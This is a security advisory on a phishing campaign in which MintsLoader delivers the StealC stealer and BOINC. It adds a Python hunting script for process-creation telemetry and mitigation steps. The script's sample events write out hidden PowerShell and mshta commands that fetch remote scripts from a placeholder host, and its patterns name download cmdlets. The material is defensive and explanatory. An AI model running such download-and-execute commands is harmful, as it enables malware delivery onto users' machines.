MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Summary:
In early January 2025, threat hunters from eSentire detected and analyzed an ongoing threat campaign that utilizes the malware loader MintsLoader to deliver secondary payloads, including the StealC information stealer and BOINC, a legitimate open-source network computing platform. MintsLoader is a PowerShell-based loader that eSentire observed being delivered via email phishing spam containing either a link to Kongtuke/ClickFix pages or a JScript file. The critical sectors targeted by this campaign are Energy and Legal Services in the US and Europe. The attack chain witnessed by eSentire begins with a link in a spam email as the initial infection vector. This link downloads an obfuscated JavaScript file that runs a PowerShell command to download MintsLoader via curl and then deletes itself to hinder post-exploitation analysis. In alternate attack chains, the victim is redirected to ClickFix-style pages that lead to the delivery of MintsLoader via the Windows Run prompt. MintsLoader contacts the threat actor’s C2 server to fetch PowerShell payloads that perform various checks to evade sandbox analysis. The attack ultimately deploys StealC which, notably, can avoid targeting machines in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan if desired.
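The two delivery paths described above (JScript file spawning PowerShell with curl, and ClickFix pasting into the Run prompt so explorer.exe spawns PowerShell or mshta.exe) both leave a distinctive parent/child process pair. The following is an added hunting example, not eSentire's code; the record fields mimic Sysmon Event ID 1 and the sample command lines are constructed, not real MintsLoader artifacts.

```python
"""Flag MintsLoader-style delivery chains in process-creation telemetry."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcEvent:
    parent: str    # parent image name (assumed field, e.g. "wscript.exe")
    image: str     # child image name
    cmdline: str   # child command line

# Script hosts the advisory recommends blocking; explorer.exe is the Run-prompt parent.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# curl is the downloader named in the report; the other cues are common PowerShell equivalents.
DOWNLOAD_RE = re.compile(r"\b(curl(\.exe)?|Invoke-WebRequest|iwr|DownloadString)\b", re.I)
HIDDEN_RE = re.compile(r"-(w(indowstyle)?\s+hidden|nop|noprofile)\b", re.I)

def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label, or None when the event looks benign."""
    img, par, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline
    if img in POWERSHELL and par in SCRIPT_HOSTS and DOWNLOAD_RE.search(cmd):
        return "jscript-to-powershell-download"   # JScript attachment -> PowerShell + curl
    if img in POWERSHELL and par == "explorer.exe" and (DOWNLOAD_RE.search(cmd) or HIDDEN_RE.search(cmd)):
        return "run-prompt-powershell"            # ClickFix: pasted into Win+R
    if img == "mshta.exe" and par == "explorer.exe" and re.search(r"https?://", cmd, re.I):
        return "run-prompt-mshta-remote"          # Run prompt launching a remote HTA
    return None

def hunt(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (parent, image, label) for every event that matches a chain."""
    return [(e.parent, e.image, label) for e in events if (label := classify(e))]

# Constructed sample telemetry (placeholders, not real campaign command lines).
SAMPLE = [
    ProcEvent("wscript.exe", "powershell.exe",
              'powershell -w hidden -c "curl.exe -o $env:TEMP\\a.ps1 http://example.invalid/x"'),
    ProcEvent("explorer.exe", "powershell.exe", 'powershell -nop -w hidden -c "iwr http://example.invalid/v"'),
    ProcEvent("explorer.exe", "mshta.exe", "mshta http://example.invalid/page"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell"),                          # interactive, benign
    ProcEvent("services.exe", "powershell.exe", "powershell -File C:\\ops\\backup.ps1"),  # admin task, benign
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE):
        print(hit)
```

Feed real Sysmon or EDR process-creation records into `ProcEvent` and treat each label as a triage lead; the Run-prompt rules in particular need tuning against local admin habits.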

Security Officer Comments:
The use of the ClickFix/KongTuke technique in these attacks is interesting as this campaign arises amidst a spike in malicious campaigns that were also utilizing the ClickFix/KongTuke technique by tricking users into running malicious commands on their machine via fake CAPTCHA prompts. The use of this technique in multiple campaigns highlights its effectiveness and increased adoption in cyberattacks. StealC has been sold to affiliates under the Malware-as-a-Service model since early 2023. Its codebase has been assessed as an offshoot of a stealer malware known as Arkei. The implementation of various checks and the deletion of files to remove indicators of their intrusion activity underscore the sophistication of this attack chain.

Suggested Corrections:
IOCs are available here.

The increase in remote work has increased reliance on email as a vital communication mechanism. These conditions also increase the risk of personnel being targeted by phishing or spam attacks, and thus of ransomware and other malware infections. End users should adhere to the following recommendations:
  • Do not open emails or download software from untrusted sources.
  • Do not click on links or attachments in emails that come from unknown senders.
  • Do not supply passwords, personal information, or financial information via email to anyone (sensitive information is also used for double extortion).
  • Always verify the email sender's email address, name, and domain.
  • Protect devices using antivirus, anti-spam, and anti-spyware software.
  • Report phishing emails to the appropriate security or IT staff immediately.
Recommendations from the eSentire Threat Response Unit:
  • Disable the Run prompt via GPO:
    • User Configuration > Administrative Templates > Start Menu and Taskbar > Enable “Remove Run menu from Start Menu”
  • Disable wscript.exe via AppLocker GPO or Windows Defender Application Control (WDAC):
    • C:\Windows\System32\WScript.exe
    • C:\Windows\SysWOW64\WScript.exe
    • *:\Windows\System32\WScript.exe (* is a wildcard covering drive letters other than C)
    • *:\Windows\SysWOW64\WScript.exe (* is a wildcard covering drive letters other than C)
  • Disable mshta.exe via AppLocker GPO or Windows Defender Application Control (WDAC):
    • C:\Windows\System32\mshta.exe
    • C:\Windows\SysWOW64\mshta.exe
    • *:\Windows\System32\mshta.exe (* is a wildcard covering drive letters other than C)
    • *:\Windows\SysWOW64\mshta.exe (* is a wildcard covering drive letters other than C)
  • Employ email filtering and protection measures.
  • Use a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain threats.
  • Implement a Phishing and Security Awareness Training (PSAT) program that educates and informs your employees.
Link(s):
https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html

https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery

https://x.com/CERTCyberdef/status/1849392561024065779